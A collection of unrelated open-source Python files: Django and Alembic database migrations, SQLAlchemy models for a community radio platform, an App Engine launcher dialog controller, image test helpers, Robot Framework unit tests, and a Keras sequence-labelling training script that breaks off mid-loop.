# --- nimbis/django-central-message :: central_message/south_migrations/0001_initial.py (license: bsd-3-clause) ---
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models


class Migration(SchemaMigration):

    def forwards(self, orm):
        # Adding model 'CentralMessage'
        db.create_table(u'central_message_centralmessage', (
            (u'message_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['messages_extends.Message'], unique=True, primary_key=True)),
            ('generated', self.gf('django.db.models.fields.BooleanField')(default=False)),
            ('generated_on', self.gf('django.db.models.fields.DateTimeField')(null=True, blank=True)),
        ))
        db.send_create_signal(u'central_message', ['CentralMessage'])

        # Adding model 'CentralUserMessage'
        db.create_table(u'central_message_centralusermessage', (
            (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('message', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['messages_extends.Message'], unique=True, null=True, on_delete=models.SET_NULL)),
            ('master', self.gf('django.db.models.fields.related.ForeignKey')(related_name=u'central_message_centralusermessage_related', to=orm['central_message.CentralMessage'])),
        ))
        db.send_create_signal(u'central_message', ['CentralUserMessage'])

    def backwards(self, orm):
        # Deleting model 'CentralMessage'
        db.delete_table(u'central_message_centralmessage')

        # Deleting model 'CentralUserMessage'
        db.delete_table(u'central_message_centralusermessage')

    models = {
        u'auth.group': {
            'Meta': {'object_name': 'Group'},
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
            'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
        },
        u'auth.permission': {
            'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
            'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
        },
        u'auth.user': {
            'Meta': {'object_name': 'User'},
            'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
            'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
            'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"}),
            'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
        },
        u'central_message.centralmessage': {
            'Meta': {'object_name': 'CentralMessage', '_ormbases': [u'messages_extends.Message']},
            'generated': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'generated_on': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
            u'message_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['messages_extends.Message']", 'unique': 'True', 'primary_key': 'True'})
        },
        u'central_message.centralusermessage': {
            'Meta': {'object_name': 'CentralUserMessage'},
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'master': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'central_message_centralusermessage_related'", 'to': u"orm['central_message.CentralMessage']"}),
            'message': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['messages_extends.Message']", 'unique': 'True', 'null': 'True', 'on_delete': 'models.SET_NULL'})
        },
        u'contenttypes.contenttype': {
            'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
            'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
        },
        u'messages_extends.message': {
            'Meta': {'object_name': 'Message'},
            'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            'expires': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
            'extra_tags': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'level': ('django.db.models.fields.IntegerField', [], {}),
            'message': ('django.db.models.fields.TextField', [], {}),
            'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
            'read': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'})
        }
    }

    complete_apps = ['central_message']
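
# Illustrative usage (added; not from the original repo): a South migration like
# the one above is normally applied with the management command below — a
# sketch, assuming South is installed and `central_message` is in INSTALLED_APPS.
#
#   $ python manage.py migrate central_message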


# --- rootio/rootio_web :: rootio/content/models.py (license: agpl-3.0) ---
import pytz
import datetime
from coaster.sqlalchemy import BaseMixin
from sqlalchemy.sql import func
from sqlalchemy.ext.hybrid import hybrid_property

from ..extensions import db
from ..utils import STRING_LEN

t_tracknetwork = db.Table(
    u'content_tracknetwork',
    db.Column(u'track_id', db.ForeignKey('content_track.id')),
    db.Column(u'network_id', db.ForeignKey('radio_network.id'))
)


class ContentTrack(BaseMixin, db.Model):
    """A track to which audio content is added"""
    __tablename__ = u'content_track'

    name = db.Column(db.String(STRING_LEN))
    description = db.Column(db.Text)
    uri = db.Column(db.String(200))
    # add array
    type_id = db.Column(db.ForeignKey('content_type.id'))
    uploaded_by = db.Column(db.ForeignKey('user_user.id'))
    deleted = db.Column(db.Boolean, default=False)
    continuous_play = db.Column(db.Boolean)
    content_type = db.relationship(u'ContentType', backref=db.backref('track_content'))
    networks = db.relationship(u'Network', secondary=u'content_tracknetwork', backref=db.backref('tracks'))

    def __unicode__(self):
        return self.name


class ContentUploads(BaseMixin, db.Model):
    """An upload to a particular track"""
    __tablename__ = u'content_uploads'

    name = db.Column(db.String(STRING_LEN))
    uri = db.Column(db.String(200))
    ok_to_play = db.Column(db.Boolean)
    order = db.Column(db.Integer, default=0)
    deleted = db.Column(db.Boolean, default=False)
    uploaded_by = db.Column(db.ForeignKey('user_user.id'))
    track_id = db.Column(db.ForeignKey('content_track.id'))
    type_id = db.Column(db.ForeignKey('content_type.id'))
    date_created = db.Column(db.DateTime(timezone=True), server_default=func.now())
    updated_at = db.Column(db.DateTime(timezone=True), server_default=func.now())
    track = db.relationship(u'ContentTrack', backref=db.backref('files'))

    def __unicode__(self):
        return self.name

    @hybrid_property
    def is_remote(self):
        return self.uri.startswith('http://') or self.uri.startswith('https://')


class CommunityMenu(BaseMixin, db.Model):
    """An IVR menu for communities to record ads, announcements and greetings"""
    __tablename__ = u"content_communitymenu"

    station_id = db.Column(db.ForeignKey('radio_station.id'))
    welcome_message = db.Column(db.String(200))
    welcome_message_txt = db.Column(db.Text())
    no_input_message = db.Column(db.String(200))
    no_input_message_txt = db.Column(db.Text())
    days_prompt = db.Column(db.String(200))
    days_prompt_txt = db.Column(db.Text())
    record_prompt = db.Column(db.String(200))
    record_prompt_txt = db.Column(db.Text())
    message_type_prompt = db.Column(db.String(200))
    message_type_prompt_txt = db.Column(db.Text())
    finalization_prompt = db.Column(db.String(200))
    finalization_prompt_txt = db.Column(db.Text())
    goodbye_message = db.Column(db.String(200))
    goodbye_message_txt = db.Column(db.Text())
    use_tts = db.Column(db.Boolean(), default=False)
    prefetch_tts = db.Column(db.Boolean(), default=True)
    date_created = db.Column(db.DateTime(timezone=True), default=datetime.datetime.utcnow)
    updated_at = db.Column(db.DateTime(timezone=True), default=datetime.datetime.utcnow)
    station = db.relationship(u'Station', backref=db.backref('community_menu'))
    deleted = db.Column(db.Boolean, default=False, nullable=False)


class CommunityContent(BaseMixin, db.Model):
    """A message left by a member of the community (ad, greeting, announcement)"""
    __tablename__ = u"content_communitycontent"

    station_id = db.Column(db.ForeignKey('radio_station.id'))
    originator = db.Column(db.String(20))
    message = db.Column(db.String(100))
    duration = db.Column(db.Integer)
    date_created = db.Column(db.DateTime(timezone=True), server_default=func.now())
    type_code = db.Column(db.Integer)
    valid_until = db.Column(db.DateTime(timezone=True))
    approved = db.Column(db.Boolean(), default=False)
    deleted = db.Column(db.Boolean, default=False)
    station = db.relationship(u'Station', backref=db.backref('community_content'))


class ContentPodcast(BaseMixin, db.Model):
    """Definition of a podcast"""
    __tablename__ = u'content_podcast'

    name = db.Column(db.String(STRING_LEN))
    uri = db.Column(db.String(200))
    description = db.Column(db.String(1000))
    ok_to_play = db.Column(db.Boolean)
    created_by = db.Column(db.ForeignKey('user_user.id'))
    date_created = db.Column(db.DateTime(timezone=True), server_default=func.now())
    updated_at = db.Column(db.DateTime(timezone=True), server_default=func.now())
    deleted = db.Column(db.Boolean)


class ContentPodcastDownload(BaseMixin, db.Model):
    """Download of a podcast file"""
    __tablename__ = u'content_podcastdownload'

    file_name = db.Column(db.String(255, convert_unicode=True))
    duration = db.Column(db.String(10))
    title = db.Column(db.String(255, convert_unicode=True))
    summary = db.Column(db.Text(None, convert_unicode=True))
    podcast_id = db.Column(db.ForeignKey('content_podcast.id'))
    date_published = db.Column(db.DateTime(timezone=True))
    date_downloaded = db.Column(db.DateTime(timezone=True), server_default=func.now())
    date_created = db.Column(db.DateTime(timezone=True), server_default=func.now())
    podcast = db.relationship(u'ContentPodcast', backref=db.backref('podcast_downloads'))


class ContentMusic(BaseMixin, db.Model):
    """Music files on the phone of a station"""
    __tablename__ = u'content_music'

    title = db.Column(db.String(300, convert_unicode=True))
    album_id = db.Column(db.ForeignKey('content_musicalbum.id'))
    duration = db.Column(db.Integer)
    station_id = db.Column(db.ForeignKey('radio_station.id', ondelete='SET NULL'), nullable=True)
    artist_id = db.Column(db.ForeignKey('content_musicartist.id', ondelete='SET NULL'), nullable=True)
    station = db.relationship(u'Station', backref=db.backref('music'))
    artist = db.relationship(u'ContentMusicArtist', backref=db.backref('music'))
    date_created = db.Column(db.DateTime(timezone=True), server_default=func.now())


class ContentMusicAlbum(BaseMixin, db.Model):
    """Albums of Music files on the phone of a station"""
    __tablename__ = u'content_musicalbum'

    title = db.Column(db.String(255, convert_unicode=True))
    station_id = db.Column(db.ForeignKey('radio_station.id'))
    date_created = db.Column(db.DateTime(timezone=True), server_default=func.now())
    station = db.relationship(u'Station', backref=db.backref('albums'))


class ContentMusicArtist(BaseMixin, db.Model):
    """Artists for the media on phones"""
    __tablename__ = u'content_musicartist'

    title = db.Column(db.String(255, convert_unicode=True))
    station_id = db.Column(db.ForeignKey('radio_station.id'))
    date_created = db.Column(db.DateTime(timezone=True), server_default=func.now())
    station = db.relationship(u'Station', backref=db.backref('artists'))


class ContentMusicPlaylist(BaseMixin, db.Model):
    """Playlist of the music files on a station"""
    __tablename__ = u'content_musicplaylist'

    title = db.Column(db.String(STRING_LEN))
    station_id = db.Column(db.ForeignKey('radio_station.id'))
    description = db.Column(db.Text)
    date_created = db.Column(db.DateTime(timezone=True), server_default=func.now())
    station = db.relationship(u'Station', backref=db.backref('playlists'))
    deleted = db.Column(db.Boolean)


class ContentMusicPlayListItemType(BaseMixin, db.Model):
    """Type of Items in a playlist mapping to media - """
    __tablename__ = u'content_musicplaylistitemtype'

    title = db.Column(db.String(STRING_LEN))


t_musicartist = db.Table(
    u'content_music_musicartist',
    db.Column(u'music_id', db.ForeignKey('content_music.id')),
    db.Column(u'artist_id', db.ForeignKey('content_musicartist.id'))
)


class ContentMusicPlaylistItem(BaseMixin, db.Model):
    """Definition of an item (song, album, artist) on a playlist"""
    __tablename__ = 'content_musicplaylistitem'

    playlist_id = db.Column(db.ForeignKey('content_musicplaylist.id'))
    playlist_item_id = db.Column(db.Integer)
    playlist_item_type_id = db.Column(db.ForeignKey('content_musicplaylistitemtype.id'))
    updated_at = db.Column(db.DateTime(), server_default=func.now())
    created_at = db.Column(db.DateTime(), server_default=func.now())
    deleted = db.Column(db.Boolean, default=False)


class ContentStream(BaseMixin, db.Model):
    """Definition of a stream"""
    __tablename__ = u'content_stream'

    name = db.Column(db.String(STRING_LEN))
    uri = db.Column(db.String(200))
    description = db.Column(db.String(1000))
    ok_to_play = db.Column(db.Boolean)
    created_by = db.Column(db.ForeignKey('user_user.id'))
    date_created = db.Column(db.DateTime(timezone=True), server_default=func.now())
    updated_at = db.Column(db.DateTime(timezone=True), server_default=func.now())
    deleted = db.Column(db.Boolean)
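
# Illustrative usage (added; not part of the original file). A minimal sketch of
# exercising these models, assuming a Flask app context and a configured
# database; the field values are invented for demonstration.
def _example_create_track():
    track = ContentTrack(name='Morning news', description='Daily bulletin',
                         uri='/var/content/news.mp3', continuous_play=False)
    db.session.add(track)
    db.session.commit()
    # Uploads attach to a track through the `track` relationship's 'files' backref.
    return track.files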


# --- pcamp/google-appengine-wx-launcher :: launcher/addexisting_controller.py (license: apache-2.0) ---
#!/usr/bin/env python
#
# Copyright 2008 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

"""Controller (MVC) for the add existing (project) dialog.

A Google App Engine Application is called a 'project' internally to
the launcher to prevent confusion.  Class App is for the launcher
application itself, and class Project is for an App Engine
Application (a 'project').
"""

import os
import wx
import dialog_controller_base
import launcher
from wxgladegen import project_dialogs


class AddExistingController(dialog_controller_base.DialogControllerBase):
  """Controller for an Add Existing Project dialog.

  The controller is responsible for displaying the dialog, filling it
  in, and (if not cancelled) reading data back and creating a new
  launcher.Project.
  """

  def __init__(self, dialog=None):
    """Initialize a new controller.

    Args:
      dialog: the dialog to use.  If None, a default is chosen.
    """
    super(AddExistingController, self).__init__()
    self.dialog = (dialog or project_dialogs.AddExistingProjectDialog(None))
    self.MakeBindings()
    # Make sure we don't create a Project until we've actually OK'd the dialog.
    self._dialog_return_value = None

  def _BrowseForDirectory(self, evt):
    """Browse for a directory, then set its path in the dialog.

    Called directly from UI.
    """
    # Default path is the parent directory
    default_path = self.GetPath()
    if os.path.exists(default_path):
      default_path = os.path.join(default_path, '..')
    else:
      default_path = ''
    # On MacOSX, wx.DD_DIR_MUST_EXIST doesn't appear to be honored. :-(
    dirname = wx.DirSelector(message='Pick an existing App Engine App',
                             defaultPath=default_path,
                             style=wx.DD_DIR_MUST_EXIST)
    if dirname:
      self.SetPath(dirname)

  def MakeBindings(self):
    """Bind events on our dialog."""
    self.MakeBindingsOKCancel()
    self.dialog.Bind(wx.EVT_BUTTON, self._BrowseForDirectory,
                     self.dialog.app_browse_button)

  def SetPort(self, port):
    """Set the port in the dialog.

    Args:
      port: the port number to use.
    """
    self.dialog.app_port_text_ctrl.SetValue(str(port))

  def SetPath(self, path):
    """Set the path in the dialog.

    Args:
      path: the path to use.
    """
    if not path:
      path = ''
    self.dialog.app_path_text_ctrl.SetValue(path)

  def GetPort(self):
    """Return the port in the dialog."""
    return self.dialog.app_port_text_ctrl.GetValue()

  def GetPath(self):
    """Return the path in the dialog."""
    return self.dialog.app_path_text_ctrl.GetValue()

  def ShowModal(self):
    """Show our dialog modally.

    Returns:
      wx.ID_OK if Update was clicked; wx.ID_CANCEL if Cancel was clicked.
    """
    self._dialog_return_value = self.dialog.ShowModal()
    return self._dialog_return_value

  def _SanityCheckPath(self, path, check_contents=True):
    """Sanity check new values before making a Project.

    Args:
      path: a filesystem path (from the dialog)
      check_contents: if True, check if the contents look valid.
        If invalid, warn, but allow things to continue.
    Returns:
      True if we should make a project from this value.
    """
    if not (path and os.path.isdir(path)):
      self.FailureMessage('Path invalid; cannot make project.',
                          'Add Application')
      return False
    if check_contents and not os.path.exists(os.path.join(path, 'app.yaml')):
      self.FailureMessage('Specified path doesn\'t look like an application; ' +
                          '%s/app.yaml not present. (Allowing anyway.)' % path,
                          'Add Application')
      # fall through; looks bad but don't deny just in case.
    # We made it!
    return True

  def _SanityCheckPort(self, port):
    """Sanity check new values before making a Project.

    Args:
      port: the port for the project (also from the dialog)
    Returns:
      True if we should make a project from this value.
    """
    try:
      port = int(port)
    except ValueError:
      port = None
    if not port or port < 1024:
      self.FailureMessage('Port invalid (not a number or less than 1024); ' +
                          'cannot make project.',
                          'Add Application')
      return False
    return True

  def Project(self):
    """Return a project created from interaction with this dialog.

    Returns:
      A launcher.Project, or None.
    """
    if self._dialog_return_value != wx.ID_OK:
      return None
    path = self.GetPath()
    port = self.GetPort()
    if not (self._SanityCheckPath(path) and self._SanityCheckPort(port)):
      return None
    return launcher.Project(path, port)
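
# Illustrative usage (added; not part of the original file). A rough sketch of
# driving the controller from the launcher, assuming a running wx.App; error
# handling and parenting are omitted.
def _example_add_existing_project():
  controller = AddExistingController()
  controller.SetPort(8080)
  if controller.ShowModal() == wx.ID_OK:
    # Project() returns None if the inputs failed the sanity checks above.
    return controller.Project()
  return None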


# --- snicoper/snicoper.com :: tests/unit/images.py (license: mit) ---
import os
from django.core.files.uploadedfile import SimpleUploadedFile
from PIL import Image

from config.settings.test import MEDIA_ROOT


def simple_uploaded_file(image_path):
    """Create a SimpleUploadedFile for ImageField/FileField model fields.

    Args:
        image_path (str): Path of the image to "upload".

    Returns:
        SimpleUploadedFile:
    """
    if not os.path.exists(image_path):
        raise FileNotFoundError('The file "{}" does not exist'.format(image_path))
    name = os.path.basename(image_path)
    with open(image_path, 'rb') as fh:
        image = SimpleUploadedFile(
            name=name,
            content=fh.read(),
            content_type='image/jpeg'
        )
    return image


def create_image(name='test.png', size=(150, 150), ext='png'):
    """Create an image and save it at get_image_path.

    Args:
        name (str): Name of the image, "test.png" by default.
        size (tuple): Width/height of the image, (150, 150) by default.
        ext (str): Extension of the image without the dot, "png" by default.

    Returns:
        The created image.
    """
    color = (255, 0, 0, 0)
    image = Image.new('RGB', size=size, color=color)
    image.save(get_image_path(name), ext)
    return image


def get_image_path(name='test.png'):
    """Build the full path of the image: /MEDIA_ROOT/{name}.

    Args:
        name (str): Name of the image.

    Returns:
        The path including the file name, in the form /MEDIA_ROOT/image.png.
    """
    return '{}/{}'.format(MEDIA_ROOT, name)


def delete_image(name='test.png'):
    """Delete an image.

    Args:
        name (str): Name of the image.
    """
    image_path = get_image_path(name)
    if os.path.exists(image_path):
        os.remove(image_path)
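
# Illustrative usage (added; not part of the original file). A minimal sketch of
# the round trip these helpers support in a test, assuming Django's test
# settings are loaded so MEDIA_ROOT resolves.
def _example_round_trip():
    create_image(name='sample.png', size=(64, 64), ext='png')
    upload = simple_uploaded_file(get_image_path('sample.png'))
    assert upload.name == 'sample.png'
    delete_image('sample.png')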


# --- charlesj/Apollo :: database/versions/5da21d856a57_add_jobs.py (license: mit) ---
"""Add Jobs

Revision ID: 5da21d856a57
Revises: edd910853060
Create Date: 2017-07-30 16:43:35.839411

"""
from alembic import op
import sqlalchemy as sa

# revision identifiers, used by Alembic.
revision = '5da21d856a57'
down_revision = 'edd910853060'
branch_labels = None
depends_on = None


def upgrade():
    op.create_table(
        'jobs',
        sa.Column('id', sa.Integer, primary_key=True, autoincrement=True),
        sa.Column('command_name', sa.String(100), nullable=False),
        sa.Column('parameters', sa.Text(), nullable=False),
        sa.Column('schedule', sa.Text(), nullable=False),
        sa.Column('created_at', sa.DateTime(timezone=True), nullable=False),
        sa.Column('last_executed_at', sa.DateTime(timezone=True), nullable=True),
        sa.Column('expired_at', sa.DateTime(timezone=True), nullable=True),
    )

    op.create_table(
        'job_history',
        sa.Column('id', sa.Integer, primary_key=True, autoincrement=True),
        sa.Column('job_id', sa.Integer, nullable=False),
        sa.Column('execution_id', sa.String(256), nullable=False),
        sa.Column('executed_at', sa.DateTime(timezone=True), nullable=False),
        sa.Column('execution_ended', sa.DateTime(timezone=True), nullable=True),
        sa.Column('results', sa.Text(), nullable=True),
        sa.Column('result_type', sa.String(100), nullable=True),
    )


def downgrade():
    op.drop_table('jobs')
    op.drop_table('job_history')
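
# Illustrative usage (added; not part of the original file): Alembic migrations
# like this one are applied and rolled back from the command line — a sketch,
# assuming an alembic.ini pointing at the target database.
#
#   $ alembic upgrade 5da21d856a57
#   $ alembic downgrade edd910853060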


# --- synsun/robotframework :: utest/running/test_userhandlers.py (license: apache-2.0) ---
import unittest

from robot.errors import DataError
from robot.model import Keywords
from robot.running.userkeyword import (EmbeddedArgs, EmbeddedArgsTemplate,
                                       UserKeywordHandler)
from robot.running.arguments import EmbeddedArguments, UserKeywordArgumentParser
from robot.utils.asserts import assert_equal, assert_true, assert_raises


class Fake(object):
    value = ''
    message = ''

    def __iter__(self):
        return iter([])


class FakeArgs(object):

    def __init__(self, args):
        self.value = args

    def __nonzero__(self):
        return bool(self.value)

    def __iter__(self):
        return iter(self.value)


class HandlerDataMock:

    def __init__(self, name, args=[]):
        self.name = name
        self.args = FakeArgs(args)
        self.metadata = {}
        self.keywords = Keywords()
        self.defaults = []
        self.varargs = None
        self.minargs = 0
        self.maxargs = 0
        self.return_value = None
        self.doc = Fake()
        self.timeout = Fake()
        self.return_ = Fake()
        self.tags = ()
        self.teardown = None


def EAT(name, args=[]):
    handler = HandlerDataMock(name, args)
    embedded = EmbeddedArguments(name)
    return EmbeddedArgsTemplate(handler, 'resource', embedded)


class TestEmbeddedArgs(unittest.TestCase):

    def setUp(self):
        self.tmp1 = EAT('User selects ${item} from list')
        self.tmp2 = EAT('${x} * ${y} from "${z}"')

    def test_no_embedded_args(self):
        assert_true(not EmbeddedArguments('No embedded args here'))
        assert_true(EmbeddedArguments('${Yes} embedded args here'))

    def test_get_embedded_arg_and_regexp(self):
        assert_equal(self.tmp1.embedded_args, ['item'])
        assert_equal(self.tmp1.embedded_name.pattern,
                     '^User\\ selects\\ (.*?)\\ from\\ list$')
        assert_equal(self.tmp1.name, 'User selects ${item} from list')

    def test_get_multiple_embedded_args_and_regexp(self):
        assert_equal(self.tmp2.embedded_args, ['x', 'y', 'z'])
        assert_equal(self.tmp2.embedded_name.pattern,
                     '^(.*?)\\ \\*\\ (.*?)\\ from\\ \\"(.*?)\\"$')

    def test_create_handler_when_no_match(self):
        assert_raises(ValueError, EmbeddedArgs, 'Not matching', self.tmp1)

    def test_create_handler_with_one_embedded_arg(self):
        handler = EmbeddedArgs('User selects book from list', self.tmp1)
        assert_equal(handler.embedded_args, [('item', 'book')])
        assert_equal(handler.name, 'User selects book from list')
        assert_equal(handler.longname, 'resource.User selects book from list')
        handler = EmbeddedArgs('User selects radio from list', self.tmp1)
        assert_equal(handler.embedded_args, [('item', 'radio')])
        assert_equal(handler.name, 'User selects radio from list')
        assert_equal(handler.longname, 'resource.User selects radio from list')

    def test_create_handler_with_many_embedded_args(self):
        handler = EmbeddedArgs('User * book from "list"', self.tmp2)
        assert_equal(handler.embedded_args,
                     [('x', 'User'), ('y', 'book'), ('z', 'list')])

    def test_create_handler_with_empty_embedded_arg(self):
        handler = EmbeddedArgs('User selects from list', self.tmp1)
        assert_equal(handler.embedded_args, [('item', '')])

    def test_create_handler_with_special_characters_in_embedded_args(self):
        handler = EmbeddedArgs('Janne & Heikki * "enjoy" from """', self.tmp2)
        assert_equal(handler.embedded_args,
                     [('x', 'Janne & Heikki'), ('y', '"enjoy"'), ('z', '"')])

    def test_embedded_args_without_separators(self):
        template = EAT('This ${does}${not} work so well')
        handler = EmbeddedArgs('This doesnot work so well', template)
        assert_equal(handler.embedded_args, [('does', ''), ('not', 'doesnot')])

    def test_embedded_args_with_separators_in_values(self):
        template = EAT('This ${could} ${work}-${OK}')
        handler = EmbeddedArgs("This doesn't really work---", template)
        assert_equal(handler.embedded_args,
                     [('could', "doesn't"), ('work', 'really work'), ('OK', '--')])

    def test_creating_handlers_is_case_insensitive(self):
        handler = EmbeddedArgs('User SELECts book frOm liST', self.tmp1)
        assert_equal(handler.embedded_args, [('item', 'book')])
        assert_equal(handler.name, 'User SELECts book frOm liST')
        assert_equal(handler.longname, 'resource.User SELECts book frOm liST')

    def test_embedded_args_handler_has_all_needed_attributes(self):
        normal = UserKeywordHandler(HandlerDataMock('My name'), None)
        embedded = EmbeddedArgs('My name', EAT('My ${name}'))
        for attr in dir(normal):
            assert_true(hasattr(embedded, attr), "'%s' missing" % attr)


class TestGetArgSpec(unittest.TestCase):

    def test_no_args(self):
        self._verify('')

    def test_one_arg(self):
        self._verify('${arg1}', ['arg1',])

    def test_one_vararg(self):
        self._verify('@{varargs}', exp_varargs='varargs')

    def test_one_default(self):
        self._verify('${arg1} ${arg2}=default @{varargs}',
                     ['arg1', 'arg2'], ['default'], 'varargs')

    def test_one_empty_default(self):
        self._verify('${arg1} ${arg2}= @{varargs}',
                     ['arg1', 'arg2'], [''], 'varargs')

    def test_many_defaults(self):
        self._verify('${arg1}=default1 ${arg2}=default2 ${arg3}=default3',
                     ['arg1', 'arg2', 'arg3'],
                     ['default1', 'default2', 'default3'])

    def _verify(self, in_args, exp_args=[], exp_defaults=[], exp_varargs=None):
        argspec = self._parse(in_args)
        assert_equal(argspec.positional, exp_args)
        assert_equal(argspec.defaults, exp_defaults)
        assert_equal(argspec.varargs, exp_varargs)

    def _parse(self, in_args):
        return UserKeywordArgumentParser().parse(in_args.split())

    def test_many_varargs_raises(self):
        assert_raises(DataError, self._parse, '@{varargs} @{varargs2}')

    def test_args_after_varargs_raises(self):
        assert_raises(DataError, self._parse, '@{varargs} ${arg1}')

    def test_get_defaults_before_args_raises(self):
        assert_raises(DataError, self._parse, '${args1}=default ${arg2}')


if __name__ == '__main__':
    unittest.main()


# --- danche354/Sequence-Labeling :: chunk/senna-hash-2-pos-d6-128-64.py (license: mit) ---
from keras.models import Model
from keras.layers import Input, Masking, Dense, LSTM
from keras.layers import Dropout, TimeDistributed, Bidirectional, merge
from keras.layers.embeddings import Embedding
from keras.utils import np_utils

import numpy as np
import pandas as pd

import sys
import math
import os
from datetime import datetime

# add path
sys.path.append('../')
sys.path.append('../tools')

from tools import conf
from tools import load_data
from tools import prepare
from tools import plot

np.random.seed(0)

# train hyperparameters
step_length = conf.chunk_step_length
pos_length = conf.chunk_pos_length
emb_vocab = conf.senna_vocab
emb_length = conf.senna_length
hash_vocab = conf.chunk_hash_vocab
hash_length = conf.chunk_hash_length
output_length = conf.chunk_NP_length
split_rate = conf.chunk_split_rate
batch_size = conf.batch_size
nb_epoch = conf.nb_epoch

model_name = os.path.basename(__file__)[:-3]
folder_path = 'model/%s' % model_name
if not os.path.isdir(folder_path):
    os.makedirs(folder_path)

# the data, shuffled and split between train and test sets
train_data, dev_data = load_data.load_chunk(dataset='train.txt', split_rate=split_rate)

train_samples = len(train_data)
dev_samples = len(dev_data)
print('train shape:', train_samples)
print('dev shape:', dev_samples)
print()

word_embedding = pd.read_csv('../preprocessing/senna/embeddings.txt', delimiter=' ', header=None)
word_embedding = word_embedding.values
word_embedding = np.concatenate([np.zeros((1, emb_length)), word_embedding, np.random.uniform(-1, 1, (1, emb_length))])

hash_embedding = pd.read_csv('../preprocessing/chunk-auto-encoder-2/auto-encoder-embeddings.txt', delimiter=' ', header=None)
hash_embedding = hash_embedding.values
hash_embedding = np.concatenate([np.zeros((1, hash_length)), hash_embedding, np.random.rand(1, hash_length)])

embed_index_input = Input(shape=(step_length,))
embedding = Embedding(emb_vocab + 2, emb_length, weights=[word_embedding], mask_zero=True, input_length=step_length)(embed_index_input)

hash_index_input = Input(shape=(step_length,))
encoder_embedding = Embedding(hash_vocab + 2, hash_length, weights=[hash_embedding], mask_zero=True, input_length=step_length)(hash_index_input)

pos_input = Input(shape=(step_length, pos_length))

senna_hash_pos_merge = merge([embedding, encoder_embedding, pos_input], mode='concat')
input_mask = Masking(mask_value=0)(senna_hash_pos_merge)
dp_1 = Dropout(0.6)(input_mask)
hidden_1 = Bidirectional(LSTM(128, return_sequences=True))(dp_1)
hidden_2 = Bidirectional(LSTM(64, return_sequences=True))(hidden_1)
dp_2 = Dropout(0.6)(hidden_2)
output = TimeDistributed(Dense(output_length, activation='softmax'))(dp_2)
model = Model(input=[embed_index_input, hash_index_input, pos_input], output=output)

model.compile(loss='categorical_crossentropy',
              optimizer='rmsprop',
              metrics=['accuracy'])

print(model.summary())

number_of_train_batches = int(math.ceil(float(train_samples) / batch_size))
number_of_dev_batches = int(math.ceil(float(dev_samples) / batch_size))

print('start train %s ...\n' % model_name)

best_accuracy = 0
best_epoch = 0
all_train_loss = []
all_dev_loss = []
all_dev_accuracy = []

log = open('%s/model_log.txt' % folder_path, 'w')

start_time = datetime.now()
print('train start at %s\n' % str(start_time))
log.write('train start at %s\n\n' % str(start_time))

for epoch in range(nb_epoch):
    start = datetime.now()
    print('-' * 60)
